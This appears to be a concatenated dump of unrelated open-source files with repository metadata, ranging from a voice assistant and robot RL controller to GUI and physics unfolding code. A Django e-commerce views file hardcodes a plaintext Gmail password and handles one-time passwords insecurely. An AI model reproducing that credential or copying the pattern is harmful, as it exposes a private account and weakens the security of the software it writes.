'left': 0,
'position': 'relative',
'margin-bottom': '10px',
'margin-left': '10px',
'margin-right': '10px',
}
html += '<div id="text_div"'
html += add_style(style_dict)
html += '>'
html += inner
html += "</div></div>"
return html
class HTMLPage:
header = ""
body = ""
def __init__(self, page_css=None):
self.body = ""
self.header = ""
if not page_css:
self.header += add_css('css/basic.css')
else:
self.header += add_css(page_css)
self.header += add_title("Smashed")
self.header += add_ttf_font('/font/edosz.ttf', 'Edo')
def add_header(self, item):
self.header += item
def add_body(self, item):
self.body += item
def get_html(self):
return create_html(self.header, self.body)
|
dpenning/Sm4shed
|
SmashedLobby/html_helper.py
|
html_helper.py
|
py
| 9,669 |
python
|
en
|
code
| 2 |
github-code
|
6
|
42827733659
|
from global_collection import *
from language_collection import *
from thread_collection import *
from aiy.cloudspeech import CloudSpeechClient
from aiy.board import Board, Led
from alzheimer import *
from assistant_grpc_demo import *
def main():
malddomi = Malddomi()
#객체 생성
thread_instance = AsyncTask()
# alzheimer_instance = Alzheimer()
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description='Assistant service example.')
parser.add_argument('--language', default=locale_language())
args = parser.parse_args()
logging.info('Initializing for language %s...', args.language)
hints = get_hints(args.language)
client = CloudSpeechClient()
#알람기능
alarm = threading.Thread(target = thread_instance.thread_alarm)
alarm.start()
#네트워크 기능
network = threading.Thread(target = thread_instance.thread_network)
network.start()
#
# createDB = threading.Thread(target=thread_instance.thread_date_create)
# createDB.start()
with Board() as board:
while True:
if hints:
logging.info('new_test : Say something, e.g. %s.' % ', '.join(hints))
else:
logging.info('new_test : Say something.')
text = client.recognize(language_code=args.language,
hint_phrases=hints)
if text is None:
logging.info('new_test : You said nothing.')
continue
#
logging.info('new_test : You said: "%s"' % text)
if '임영웅노래틀어 줘' in text:
sing = threading.Thread(target=thread_instance.sing('/home/pi/Music/임영웅.mp3'))
sing.start()
elif '영탁노래틀어 줘' in text:
sing = threading.Thread(target=thread_instance.sing('/home/pi/Music/영탁.mp3'))
sing.start()
elif '송가인노래틀어 줘' in text:
sing = threading.Thread(target=thread_instance.sing('/home/pi/Music/송가인.mp3'))
sing.start()
elif '노래 꺼 줘' in text:
songstop = threading.Thread(target=thread_instance.songstop)
songstop.start()
elif text not in hints and '노래 틀어 줘' in text:
nosong = threading.Thread(target=thread_instance.sing('/home/pi/Music/nosong.mp3'))
nosong.start()
elif '살려 줘' in text:
emergency = threading.Thread(target=thread_instance.emergency("현재 아무개씨가 위험한 상황에 빠졌습니다. 신속히 확인 부탁드리겠습니다"))
emergency.start()
elif '치매테스트 할게' in text:
alzheimer = threading.Thread(target=thread_instance.alzheimer_test)
alzheimer.start()
elif '말또미' in text:
malddomi.thread_assistant()
elif 'goodbye' in text:
break
if __name__ == '__main__':
main()
|
YuSunjo/bit_project_hyodol
|
raspberrypi_file/new_test.py
|
new_test.py
|
py
| 3,221 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43627572834
|
from typing import List
class Solution:
def maxBoxesInWarehouse(self, boxes: List[int], warehouse: List[int]) -> int:
boxes.sort()
p1, p2 = 0, len(warehouse)-1
res = 0
for i in range(len(boxes)-1, -1, -1):
if boxes[i] <= warehouse[p1]:
p1 += 1
res += 1
elif boxes[i] <= warehouse[p2]:
p2 -= 1
res += 1
if p1 > p2:
break
return res
def test(self):
test_cases = [
[[1,2,2,3,4], [3,4,1,2]],
[[3,5,5,2], [2,1,3,4,5]],
[[1,2,3], [1,2,3,4]],
[[4,5,6], [3,3,3,3,3]],
]
for boxes, warehouse in test_cases:
res = self.maxBoxesInWarehouse(boxes, warehouse)
print('res: %s' % res)
print('-='*30 + '-')
if __name__ == '__main__':
Solution().test()
|
MichaelTQ/LeetcodePythonProject
|
solutions/leetcode_1551_1600/LeetCode1580_PutBoxesIntoTheWarehouseII.py
|
LeetCode1580_PutBoxesIntoTheWarehouseII.py
|
py
| 918 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43785018579
|
from __future__ import print_function
import argparse
import sys
import rospy
import os
import numpy as np
from geometry_msgs.msg import Twist
import time
import cv2
import tensorflow as tf
pre_path = os.path.abspath('../')
sys.path.append(pre_path)
from utils import imagezmq
# ============================== Pretrained Model ==========================
meta_path = './Unitedmap_0906_reload-0/RobotBrain/model-12063494.cptk.meta'
ckpt_path = './Unitedmap_0906_reload-0/RobotBrain/'
# ==========================================================================
config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)
config.gpu_options.allow_growth = True
# RL model class
class RL_Model:
# for testing, linear speed would be set to 0.2, while angular speed set to 0.3 or 0.4186
def __init__(self, dir, linear_speed=0.2):
# ------------------------------------------------
# dir: RL model's directory
# linear_speed: linear speed (x-axis) for AGV, default is 0.2
# ------------------------------------------------
tf.reset_default_graph()
self.sess = tf.Session()
self.saver = tf.train.import_meta_graph(path)
graph = tf.get_default_graph()
# get variable by name from tensorflow graph
self.visual_in = graph.get_tensor_by_name('visual_observation_0:0')
self.action = graph.get_tensor_by_name('action:0')
self.action_mask = graph.get_tensor_by_name('action_masks:0')
self.action_pub = rospy.Publisher('twitch', Twist, queue_size=1)
self.linear_speed = linear_speed
self.angular_speed = angular_speed
self.move_command = Twist()
# create mask to enable three action
self.mask = np.array([[1, 1, 1]])
self.saver.restore(self.sess, tf.train.latest_checkpoint(ckpt_path))
def restore_and_run(self, img):
# ----------------------------------------------------
# img_test: input image from segmentation module
# ----------------------------------------------------
# initialize parameters
self.move_command.angular.z = 0
self.move_command.linear.x = self.linear_speed
# for multinomial sampling, using " act = tf.multinomial(self.action, 1) " and revise session in next row
prob = self.sess.run([self.action], feed_dict = {self.visual_in:img, self.action_mask:self.mask})
direction = np.argmax(prob)
# 3-Action
# Keep moving forward
if direction == 0 :
self.move_command.angular.z = 0
# Turn Left
elif direction == 1:
self.move_command.angular.z = 1
# Turn Right
elif direction == 2:
self.move_command.angular.z = -1
# publish Twist
self.action_pub.publish(self.move_command)
# External class for RL model
class PolicyModel:
def __init__(self):
self.RLmodel = RL_Model(meta_path)
self.last_time = time.time()
def callback(self,resize_image):
# --------------------------------------------------
# resize_image: image received from segmentation module
# --------------------------------------------------
self.RLmodel.restore_and_run(resize_image)
self.last_time = time.time()
# RL model's test function
def test(self):
for i in range(100):
fake_image = np.zeros((1, 80, 120, 3))
self.RLmodel.restore_and_run(fake_image)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--port', type=str, help='connected port', dest='port', default='5555')
args = parser.parse_args()
rospy.init_node('control_model', anonymous=True)
hub = imagezmq.ImageHub(open_port='tcp://*:%s' %(args.port))
cm = PolicyModel()
while True:
name, image = hub.recv_image() # recieve image
start = time.time()
cv2.imshow("Image", image)
image = [image]
cm.callback(image) # process the image
print(time.time()-start)
hub.send_reply() # get ready for next image
cv2.waitKey(1)
|
KaiChen1008/Sim-to-Real-Virtual-Guidance-for-Robot-Navigation
|
control_policy_module/control_policy.py
|
control_policy.py
|
py
| 3,752 |
python
|
en
|
code
| 72 |
github-code
|
6
|
43356641346
|
#!/usr/bin/python3
from scipy import stats
import numpy as np
import matplotlib.pyplot as plt
import sys
NUM_TRIAL = 2000
def calcPlotData(numSamplings, percentiles, dist):
plotXData = np.array([])
plotYData = np.array([])
for percentile in percentiles:
tmpPlotXData = np.array([])
tmpPlotYData = np.array([])
for numSampling in numSamplings:
scores = calcScoresAtPercentile(numSampling, percentile, dist)
tmpPlotXData = np.append(tmpPlotXData, numSampling)
tmpPlotYData = np.append(tmpPlotYData, np.std(scores, ddof=1))
plotXData = np.append(plotXData, tmpPlotXData)
plotYData = np.append(plotYData, tmpPlotYData)
return plotXData.reshape(len(percentiles), len(numSamplings)), plotYData.reshape(len(percentiles), len(numSamplings))
def calcScoresAtPercentile(numSampling, percentile, dist):
scoresAtPercentile = np.array([])
for i in range(NUM_TRIAL):
samples = dist.rvs(size=numSampling)
scoresAtPercentile = np.append(scoresAtPercentile, stats.scoreatpercentile(samples, percentile))
return scoresAtPercentile
def plot(title, plotXData, plotYData, percentiles):
plt.clf()
plt.figure(figsize=(15, 9))
plt.rcParams["font.size"] = 24
plt.xticks(np.arange(0, np.max(plotXData)+10, 10))
plt.grid()
for i, x in enumerate(plotXData):
plt.plot(x, plotYData[i], marker='o', label='percentile='+str(percentiles[i]))
plt.title(title)
plt.xlabel("The number of samples")
plt.ylabel("Standard deviation")
plt.legend()
plt.savefig(title.replace(" ", "_").lower() + ".png", dpi=200)
def main():
numSamplings = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
percentiles = [1, 10, 50, 90, 99]
dists = {
"Uniform distribution": stats.uniform(),
"Normal distribution": stats.norm(),
"Exponential distribution": stats.expon()
}
for distName, dist in dists.items():
print("dist: {}".format(distName))
plotXData, plotYData = calcPlotData(numSamplings, percentiles, dist)
print(plotYData)
plot(distName, plotXData, plotYData, percentiles)
if __name__ == "__main__":
main()
|
peng225/blog
|
230114/percentile.py
|
percentile.py
|
py
| 2,211 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30789833021
|
from django.contrib import messages
from django.shortcuts import render
import random
import smtplib
from.models import Onlinepayment,Offlinepayment,Onlineapproval,Offlineapproval,Send
def home(request):
return render(request,'f1.html')
def tv(request):
return render(request,'tv.html')
def mobile(request):
return render(request,'mobile.html')
def theatre(request):
return render(request,'hometheatre.html')
def air(request):
return render(request,'airconditioner.html')
def buy(request):
if request.method == 'POST':
return render(request,'otpver.html')
else:
return render(request,'otpver.html')
def offpay(request):
if request.method == 'POST':
return render(request, 'offlinepayment.html')
else:
return render(request,'offlinepayment.html')
def onpay(request) :
if request.method == 'POST':
return render(request,'onlinepayment.html')
else:
return render(request,'onlinepyment.html')
def onlineok(request):
if request.method == 'POST':
name = request.POST['name']
address = request.POST['address']
city = request.POST['city']
ph = request.POST['ph']
mail = request.POST['mail']
item = request.POST['item']
imo = request.POST['imo']
credit = request.POST['credit']
Onlineapproval(name=name, address=address, city=city, ph=ph, mail=mail, item=item,
imo=imo, credit=credit).save()
msg = name + ", your order has been registered you will get your product within " \
"one week. Your payment has been received. for any quiries contact-xxxx "
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login("[email protected]", "Nimishakc@98")
s.sendmail("[email protected]",mail, msg)
s.quit()
messages.success(request, 'SUCCESSFULLY ORDERED YOU WILL RECIEVE AN EMAIL SHORTLY')
return render(request,'onlinepayment.html')
else:
messages.success(request, 'REGISTRATION FAILED TRY AGAIN LATER')
return render(request,'onlinepayment.html')
def offlineok(request):
if request.method == 'POST':
name = request.POST['name']
address = request.POST['address']
city = request.POST['city']
ph = request.POST['ph']
mail = request.POST['mail']
item = request.POST['item']
imo = request.POST['imo']
Offlineapproval(name=name, address=address, city=city, ph=ph, mail=mail, item=item,
imo=imo).save()
msg = name + ", your order has been registered you will get your product within " \
"one week. Your have opted offline payment system. for any quiries contact-xxxx "
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login("[email protected]", "Nimishakc@98")
s.sendmail("[email protected]", mail, msg)
s.quit()
messages.success(request, 'SUCCESSFULLY ORDERED YOU WILL RECIEVE AN EMAIL SHORTLY')
return render(request,'offlinepayment.html')
else:
messages.success(request, 'REGISTRATION FAILED TRY AGAIN LATER')
return render(request,'offlinepayment.html')
def staff(request):
return render(request,'staff.html')
def app(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
if username == 'app' and password == 'app':
return render(request, 'dashboard.html')
else:
return render(request, 'staff.html')
def onappro(request):
x = Onlineapproval.objects.all()
return render(request, 'onlineapproval.html', {'all': x})
def offapro(request):
x = Offlineapproval.objects.all()
return render(request, 'offlineapproval.html', {'all': x})
def onpays(request):
if request.method == 'POST':
return render(request,'onlinestatus.html')
else:
return render(request, 'onlinestatus.html')
def offpays(request):
if request.method == 'POST':
return render(request,'offlinestatus.html')
else:
return render(request, 'offlinestatus.html')
val=None
def send(request):
if request.method == 'POST':
email = request.POST['email']
x = str(random.randint(1000,9999))
c=x
global val
def val():
return c
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login("[email protected]", "Nimishakc@98")
s.sendmail("[email protected]",email, x)
s.quit()
messages.success(request, 'OTP SENT CHECK YOUR MAIL')
return render(request,'otpver.html')
else:
return render(request,'otpver.html')
def verify(request):
if request.method == 'POST':
otpcheck = request.POST['otpcheck']
ok=val()
if otpcheck == ok:
messages.success(request, 'LOGGED IN')
return render(request,'registration.html')
else:
messages.success(request, 'FAILED TO VERIFY OTP')
return render(request,'otpver.html')
def homea(request):
return render(request,'dashboard.html')
def logout(request):
return render(request,'staff.html')
|
Nimishakc/NimishaFinal
|
eapp/views.py
|
views.py
|
py
| 5,321 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28968326311
|
confectionery_dict = {"торт": ["состав - мука, сахар, дрожжи, арахис, шоколад, заварной крем",
"цена за 100 гр - ", 1.95, "руб", "вес - ", 3900, "гр"],
"пироженое": ["состав - мука, сахар, грецкий орех, разрыхлитель",
"цена за 100 гр - ", 2.05, "руб", "вес - ", 4120, "гр"],
"маффин": ["состав - мука, дрожжи, сахар, фруктовый джем",
"цена за 100 гр -", 1.80, "руб", "вес - ", 6100, "гр"],
"желе": ["состав - желатин, фруктовый сироп",
"цена за 100 гр -", 1.10, "руб", "вес - ", 1290, "гр"],
"пастила": ["состав - яичный белок, сахар, загуститель",
"цена за 100 гр -", 1.20, "руб", "вес -", 2120, "гр"],
"пахлава": ["состав - мука, грецкий орех, арахис, мёд",
"цена за 100 гр -", 1.50, "руб", " вес -", 2140, "гр"]}
customer = int(input("""Наберите 1, 2, 3 или 4, если Вы хотите посмотреть описание, цену,
количество или всю информацию о продукции.
Наберите 5, если Вы хотите что-то приобрести :"""))
try:
if customer == 1:
for key, value in confectionery_dict.items():
print(key, ":", value[0])
elif customer == 2:
for key, value in confectionery_dict.items():
print(key, ":", value[1:4])
elif customer == 3:
for key, value in confectionery_dict.items():
print(key, ":", value[4:])
elif customer == 4:
for key, value in confectionery_dict.items():
print(key, ":", value)
elif customer == 5:
cost_of_production = 0
for key, value in confectionery_dict.items():
i = 1
while i != 0:
purchase = input("Введите название продукции :").lower()
number_of_products = int(input("Введите количество продукции в граммах или 0 для завершения :"))
cost_of_production += float(confectionery_dict[purchase][2]) * (number_of_products / 100)
remainder_of_production = int(confectionery_dict[purchase][5]) - number_of_products
print(f"{purchase}: Oсталось продукции в продаже : {remainder_of_production} грамм")
i = int(input("Enter 1 to continue, or 0 to complete :"))
if i == 0:
print(f"Стоимость приобретенной продукции равна: {cost_of_production} руб")
break
except KeyError:
print("Нет такой продукции")
finally:
print("До свидания!")
|
vladalh/Overone-Python
|
exam2_5.py
|
exam2_5.py
|
py
| 3,354 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
34332202564
|
import csv
import os
save_path = r"/home/riddhi/keystroke/output_numpy/dataset/"
csv_file = save_path + r"genuine_user.csv"
inputfileloc = save_path + r"genuine.txt"
inputfile = open(inputfileloc, 'r')
with open(csv_file, 'w') as csvfile:
fieldnames = ['user', 'pr', 'pp', 'rp', 'rr', 'total', 'output']
csvwriter = csv.DictWriter(csvfile, fieldnames= fieldnames)
csvwriter.writeheader()
#csvwriter.writerow({'user':'1', 'pp':'2', 'pr':'3', 'rp':'4', 'rr':'5', 'total':'10', 'output':'1'})
#csvwriter.writerow({'user':'2', 'pp':'2', 'pr':'3', 'rp':'4', 'rr':'5', 'total':'10', 'output':'1'})
lines = [line[:-1] for line in inputfile]
print(lines)
for line in lines:
line = line.split()
print(line)
csvwriter.writerow({'user':line[0], 'pp':line[1], 'pr':line[2], 'rp':line[3], 'rr':line[4], 'total':line[5], 'output':line[6]})
inputfile.close()
|
vishaltak/keystroke
|
txt2csv.py
|
txt2csv.py
|
py
| 859 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32586118182
|
class UnionFind:
def __init__(self, n):
self.par = [-1]*n
self.siz = [1]*n
#経路圧縮あり
def root(self, x):
if self.par[x] == -1:
return x
self.par[x] = self.root(self.par[x])
return self.par[x]
#経路圧縮なし
"""
def root(self, x):
if self.par[x] == -1:
return x
return self.root(self.par[x])
"""
def unite(self, x, y):
rx = self.root(x)
ry = self.root(y)
if rx == ry:
return False
if self.size(rx) < self.size(ry):
rx, ry = ry, rx
self.par[ry] = rx
self.siz[rx] += self.siz[ry]
return True
def same(self, x, y):
return self.root(x) == self.root(y)
def size(self, x):
return self.siz[self.root(x)]
#解答の方針
#全部結んだ後の(木の根の数 - 1)が答えになります。
#setで管理すると楽なのでsetで管理します。
n, m = map(int, input().split())
uf = UnionFind(n)
for i in range(m):
a, b = map(int, input().split())
a -= 1
b -= 1
uf.unite(a, b)
se = set()
for i in range(n):
se.add(uf.root(i))
print(len(se) - 1)
|
yuyu5510/Union-Find
|
code/Python/ARC032B.py
|
ARC032B.py
|
py
| 1,216 |
python
|
ja
|
code
| 1 |
github-code
|
6
|
11691605009
|
import imp
import re
from PySide2.QtWidgets import QMainWindow
from PySide2.QtCore import Slot
from ui_mainwindow import Ui_MainWindow
from particulasact.particula import Particula
from particulasact.index import Nodo, Lista_ligada
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.lista_ligada = Lista_ligada()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.agregarFinal_pushButton.clicked.connect(
self.click_agregarFinal)
self.ui.agregarInicio_pushButton.clicked.connect(
self.click_agregarInicio)
self.ui.mostrar_pushButton.clicked.connect(self.click_mostrar)
def creadorDeParticulas(self):
destinoX = self.ui.destinoX_spinBox.value()
origenX = self.ui.origenX_spinBox.value()
destinoY = self.ui.destinoY_spinBox.value()
origenY = self.ui.origenY_spinBox.value()
velocidad = self.ui.velocidad_spinBox.value()
red = self.ui.red_spinBox.value()
green = self.ui.green_spinBox.value()
blue = self.ui.blue_spinBox.value()
return Particula(self.lista_ligada.no_elements+1, origenX, origenY,
destinoX, destinoY, velocidad, red, green, blue)
@Slot()
def click_mostrar(self):
self.ui.salida.clear()
self.ui.salida.insertPlainText(str(self.lista_ligada))
@Slot()
def click_agregarFinal(self):
particula = self.creadorDeParticulas()
nodo = Nodo(particula)
self.lista_ligada.agregar_final(nodo)
self.ui.salida.clear()
self.ui.salida.insertPlainText("Agregado al Final")
""" self.ui.salida.insertPlainText(
f"ID:{particula.id}\nOrigen X:{particula.origen_x}\nDestino X: {particula.destino_x}\nOrigen Y:{particula.origen_y}\nDestino Y: {particula.destino_y}\nVelocidad: {particula.velocidad}\nDistancia:{particula.distancia}\nRed: {particula.red}\nGreen: {particula.green}\nBlue: {particula.blue}")
"""
@Slot()
def click_agregarInicio(self):
particula = self.creadorDeParticulas()
nodo = Nodo(particula)
self.lista_ligada.agregar_inicio(nodo)
self.ui.salida.clear()
self.ui.salida.insertPlainText("Agregado al Inicio")
|
arturos8617/actividad06
|
mainwindow.py
|
mainwindow.py
|
py
| 2,290 |
python
|
es
|
code
| 0 |
github-code
|
6
|
41746506951
|
# -*- coding:utf-8 -*-
import os
os.environ["CHAINER_TYPE_CHECK"] = "0"
import numpy as np
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import cuda, Variable
from chainer.initializers import GlorotNormal
class SelectiveGate(chainer.Chain):
def __init__(self, hidden_size):
super(SelectiveGate, self).__init__(
xh=L.Linear(in_size=None,out_size=hidden_size,initialW=GlorotNormal(),nobias=True),
hh=L.Linear(in_size=None,out_size=hidden_size,initialW=GlorotNormal(),nobias=True),
)
self.hidden_size = hidden_size
def __call__(self,batch_seq_h, batch_h,enable):
batch_size = batch_seq_h.shape[0]
seq_size = batch_seq_h.shape[1]
matp = F.expand_dims(self.xh(batch_h), axis=1)
matp = F.broadcast_to(matp, (batch_size, seq_size, self.hidden_size))
ab = F.reshape(batch_seq_h,(batch_size * seq_size, -1))
wab = self.hh(ab)
wab = F.reshape(wab, (batch_size, seq_size, -1))
sGate=F.sigmoid(wab + matp)
enable = F.expand_dims(enable, axis=2)
enable = F.broadcast_to(enable, sGate.shape)
sGate = F.where(enable, sGate, self.xp.zeros(sGate.shape, dtype=self.xp.float32))
return batch_seq_h*sGate
|
rn5l/session-rec
|
algorithms/RepeatNet/base/selective_gate.py
|
selective_gate.py
|
py
| 1,280 |
python
|
en
|
code
| 362 |
github-code
|
6
|
5679963414
|
"""
Classes to be used when determining regularisation in unfolding
"""
from __future__ import print_function, division
from array import array
import numpy as np
import math
import os
from itertools import chain
import ROOT
from MyStyle import My_Style
from comparator import Contribution, Plot
My_Style.cd()
import common_utils as cu
import qg_common as qgc
import qg_general_plots as qgp
# This doesn't seem to work...sigh
np.set_printoptions(edgeitems=3,infstr='Infinity',
linewidth=75, nanstr='nan', precision=8,
suppress=False, threshold=1000, formatter=None)
ROOT.PyConfig.IgnoreCommandLineOptions = True
ROOT.gROOT.SetBatch(1)
ROOT.TH1.SetDefaultSumw2()
class TauScanner(object):
"""Class to handle doing ScanTau on a TUnfoldBinning object,
since it produces many associated objects & values.
Can also plot results from scanning.
"""
def __init__(self):
self.scan_results = ROOT.MakeNullPointer(ROOT.TSpline)
self.l_curve = ROOT.MakeNullPointer(ROOT.TGraph)
self.log_tau_x = ROOT.MakeNullPointer(ROOT.TSpline)
self.log_tau_y = ROOT.MakeNullPointer(ROOT.TSpline)
self.tau = 0
self.scan_mode = ""
self.graph_all_scan_points = None
self.graph_best_scan_point = None
def scan_tau(self, tunfolder, n_scan, tau_min, tau_max, scan_mode, distribution, axis_steering):
ind_best_point = tunfolder.ScanTau(n_scan,
tau_min,
tau_max,
self.scan_results,
scan_mode,
distribution,
axis_steering,
self.l_curve,
self.log_tau_x,
self.log_tau_y)
self.tau = tunfolder.GetTau()
self._process_results(scan_mode, ind_best_point)
print("scan_tau value is {}".format(self.tau))
print("chi**2 A {:3.1f} + chi**2 L {:3.1f} / NDOF {:3.1f} ".format(tunfolder.GetChi2A(),
tunfolder.GetChi2L(),
tunfolder.GetNdf()))
return self.tau
def _process_results(self, scan_mode, ind_best_point):
"""Create graphs etc from ScanTau output
User shouldn't call this, only internal
"""
# Get best scan point & make graph of it
# t here is log_10(tau)
t, rho = array('d'), array('d') # array obj needed to make TGraph
t0 = ROOT.Double(0.0)
rho0 = ROOT.Double(0.0)
self.scan_results.GetKnot(ind_best_point, t0, rho0)
t.append(t0)
rho.append(rho0)
self.graph_best_scan_point = ROOT.TGraph(1, t, rho)
print("t[0] =", t[0])
print("rho[0] =", rho[0])
print("10^log_10(tau) = tau =", math.pow(10., float(t0)))
# Make graph of all the points scanned
t_all, rho_all = array('d'), array('d')
n_scan = self.scan_results.GetNp()
for i in range(n_scan):
tt = ROOT.Double(0.0)
rr = ROOT.Double(0.0)
self.scan_results.GetKnot(i, tt, rr)
t_all.append(tt)
rho_all.append(rr)
self.graph_all_scan_points = ROOT.TGraph(int(n_scan), t_all, rho_all)
tau_mode_dict = {
ROOT.TUnfoldDensity.kEScanTauRhoAvg: "average (stat+bgr) global correlation (#rho)",
ROOT.TUnfoldDensity.kEScanTauRhoAvgSys: "average (stat+bgr+sys) global correlation (#rho)",
ROOT.TUnfoldDensity.kEScanTauRhoMax: "maximum (stat+bgr) global correlation (#rho)",
ROOT.TUnfoldDensity.kEScanTauRhoMaxSys: "maximum (stat+bgr+sys) global correlation (#rho)",
ROOT.TUnfoldDensity.kEScanTauRhoSquareAvg: "average (stat+bgr) global correlation (#rho) squared",
ROOT.TUnfoldDensity.kEScanTauRhoSquareAvgSys: "average (stat+bgr+sys) global correlation (#rho) squared",
}
self.graph_all_scan_points.SetTitle("Optimization of Regularization Parameter, #tau : Scan of {}".format(tau_mode_dict[scan_mode]))
def plot_scan_tau(self, output_filename):
"""Plot graph of scan results, and optimum tau"""
canv_tau_scan = ROOT.TCanvas("canv_tau_scan_"+str(self.tau), "canv_tau_scan_"+str(self.tau))
self.graph_all_scan_points.SetLineColor(ROOT.kBlue+3)
self.graph_all_scan_points.Draw()
self.graph_best_scan_point.SetMarkerColor(ROOT.kRed)
self.graph_best_scan_point.Draw("* same")
self.graph_all_scan_points.GetXaxis().SetTitle("log_{10}(#tau)")
self.graph_all_scan_points.GetYaxis().SetTitle(" #rho")
leg = ROOT.TLegend(0.2, 0.6, 0.35, 0.89)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetBorderSize(0)
leg.SetTextSize(0.026)
leg.AddEntry(self.graph_all_scan_points, 'Scan over #tau', 'l')
leg.AddEntry(self.graph_best_scan_point, 'Chosen point: #tau = {}'.format(self.tau), 'P')
leg.Draw()
cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename)))
canv_tau_scan.Print(output_filename)
def save_to_tfile(self, tfile):
tfile.WriteTObject(self.graph_all_scan_points, "regularize_all_scan_points")
tfile.WriteTObject(self.graph_best_scan_point, "regularize_best_scan_point")
class LCurveScanner(object):
"""Class to handle doing ScanLcurve on a TUnfoldBinning object,
since it produces many associated objects & values.
Can also plot results from scanning.
"""
def __init__(self):
self.scanned_l_curve = ROOT.MakeNullPointer(ROOT.TGraph)
self.log_tau_x = ROOT.MakeNullPointer(ROOT.TSpline3) # spline of L-curve x-coord as a func of log_10(tau)
self.log_tau_y = ROOT.MakeNullPointer(ROOT.TSpline3) # spline of L-curve y-coord as a func of log_10(tau)
self.log_tau_curvature = ROOT.MakeNullPointer(ROOT.TSpline3)
self.graph_log_tau_curvature = None # to hold graph of log_tau_curvature
self.graph_log_tau_curvature_best = None
self.tau = 0
self.graph_best_scan_point = None # in terms of LcurveY vs LcurveX
def scan_L(self, tunfolder, n_scan, tau_min, tau_max):
ind_best_point = tunfolder.ScanLcurve(n_scan,
tau_min,
tau_max,
self.scanned_l_curve,
self.log_tau_x,
self.log_tau_y,
self.log_tau_curvature)
self.tau = tunfolder.GetTau()
self._process_results(ind_best_point)
return self.tau
def _process_results(self, ind_best_point):
"""Create graphs etc from ScanLcurve output
User shouldn't call this, only internal
"""
# Get best scan point & make graph of it
t_0 = ROOT.Double(0.0) # is log_10(tau)
x_0 = ROOT.Double(0.0)
y_0 = ROOT.Double(0.0)
self.log_tau_x.GetKnot(ind_best_point, t_0, x_0)
self.log_tau_y.GetKnot(ind_best_point, t_0, y_0)
self.graph_best_scan_point = ROOT.TGraph(1, array('d', [x_0]), array('d', [y_0]))
# Create graph of curvature
t_all, c_all = array('d'), array('d')
n_scan = self.log_tau_curvature.GetNp()
for i in range(n_scan):
t = ROOT.Double(0.0) # is log_10(tau)
c = ROOT.Double(0.0)
self.log_tau_curvature.GetKnot(i, t, c)
t_all.append(t)
c_all.append(c)
self.graph_log_tau_curvature = ROOT.TGraph(n_scan, t_all, c_all)
# Get best scan point in terms of curvature vs log(tau)
# you cannot use the index, it doesn't correspond to this graph
c_0 = self.log_tau_curvature.Eval(t_0)
self.graph_log_tau_curvature_best = ROOT.TGraph(1, array('d', [t_0]), array('d', [c_0]))
def plot_scan_L_curve(self, output_filename):
"""Plot graph of scan results, and optimum tau"""
canv_L_scan = ROOT.TCanvas("canv_L_scan_"+str(self.tau), "canv_L_scan_"+str(self.tau))
self.scanned_l_curve.SetTitle("Optimization of Regularization Parameter, #tau : Scan of L curve")
self.scanned_l_curve.SetLineColor(ROOT.kBlue+3)
self.scanned_l_curve.Draw()
self.graph_best_scan_point.SetMarkerColor(ROOT.kRed)
self.graph_best_scan_point.Draw("* same")
self.scanned_l_curve.GetXaxis().SetTitle("log_{10}(L_{1})")
self.scanned_l_curve.GetYaxis().SetTitle("log_{10}(#frac{L_{2}}{#tau^{2}})")
leg = ROOT.TLegend(0.5, 0.6, 0.85, 0.89)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetBorderSize(0)
leg.SetTextSize(0.026)
leg.AddEntry(self.scanned_l_curve, 'Scan over #tau', 'l')
leg.AddEntry(self.graph_best_scan_point, 'Chosen point: #tau = {}'.format(self.tau), 'P')
leg.Draw()
cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename)))
canv_L_scan.Print(output_filename)
def plot_scan_L_curvature(self, output_filename):
"""Plot graph of L curvature & optimum point"""
canv_L_curvature = ROOT.TCanvas("canv_L_curvature_"+str(self.tau), "canv_L_curvature_"+str(self.tau))
self.graph_log_tau_curvature.SetTitle("Optimization of Regularization Parameter, #tau : Scan of L curvature")
self.graph_log_tau_curvature.SetLineColor(ROOT.kBlue+3)
self.graph_log_tau_curvature.Draw()
self.graph_log_tau_curvature.GetXaxis().SetTitle("log_{10}(#tau)")
self.graph_log_tau_curvature.GetYaxis().SetTitle("L-curve curvature C")
self.graph_log_tau_curvature_best.SetLineColor(ROOT.kRed)
self.graph_log_tau_curvature_best.SetMarkerColor(ROOT.kRed)
self.graph_log_tau_curvature_best.Draw("* same")
leg = ROOT.TLegend(0.5, 0.6, 0.85, 0.89)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetBorderSize(0)
leg.SetTextSize(0.026)
leg.AddEntry(self.graph_log_tau_curvature, 'Curvature', 'l')
leg.AddEntry(self.graph_log_tau_curvature_best, 'Chosen point: #tau = {}'.format(self.tau), 'P')
leg.Draw()
cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename)))
canv_L_curvature.Print(output_filename)
def save_to_tfile(self, tfile):
tfile.WriteTObject(self.scanned_l_curve, "scanned_l_curve")
tfile.WriteTObject(self.graph_best_scan_point, "graph_best_scan_point")
tfile.WriteTObject(self.graph_log_tau_curvature, "graph_log_tau_curvature")
tfile.WriteTObject(self.graph_log_tau_curvature_best, "graph_log_tau_curvature_best")
|
raggleton/QGAnalysisPlotting
|
unfolding_regularisation_classes.py
|
unfolding_regularisation_classes.py
|
py
| 11,065 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14637889375
|
black, white, empty, outer = 1, 2, 0, 3
